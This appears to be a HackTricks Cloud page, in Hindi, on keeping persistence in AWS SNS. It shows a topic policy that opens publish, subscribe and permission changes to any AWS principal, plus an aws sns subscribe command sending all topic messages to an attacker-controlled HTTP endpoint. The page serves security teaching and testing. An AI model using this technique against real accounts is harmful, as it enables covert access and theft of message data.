Hindi - Ht Cloud

AWS - SNS Persistence

हैकट्रिक्स का समर्थन करें

SNS

अधिक जानकारी के लिए देखें:

AWS - SNS Enum

Persistence

SNS topic बनाते समय आपको एक IAM नीति के साथ इंडिकेट करना होगा कौन पढ़ने और लिखने का एक्सेस है। यह संभावना है कि आप बाहरी अकाउंट्स, रोल्स के ARN, या यहाँ तक कि "*" को इंडिकेट कर सकते हैं। निम्नलिखित नीति में सभी AWS में लोगों को MySNS.fifo नामक SNS टॉपिक में पढ़ने और लिखने का एक्सेस देती है:

{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__default_statement_ID",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"SNS:Publish",
"SNS:RemovePermission",
"SNS:SetTopicAttributes",
"SNS:DeleteTopic",
"SNS:ListSubscriptionsByTopic",
"SNS:GetTopicAttributes",
"SNS:AddPermission",
"SNS:Subscribe"
],
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
"Condition": {
"StringEquals": {
"AWS:SourceOwner": "318142138553"
}
}
},
{
"Sid": "__console_pub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Publish",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
},
{
"Sid": "__console_sub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
}
]
}

उपयोक्ता बनाएं

सभी विषयों से सभी संदेशों को निकालने के लिए आगे बढ़ने के लिए हमलावर सभी विषयों के लिए उपयोक्ता बना सकता है

ध्यान दें कि यदि विषय FIFO प्रकार का है, तो केवल प्रोटोकॉल SQS का उपयोग करने वाले उपयोक्ता का उपयोग किया जा सकता है।

aws sns subscribe --region <region> \
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>
हैकट्रिक्स का समर्थन करें
PreviousAWS - S3 PersistenceNextAWS - Secrets Manager Persistence

Last updated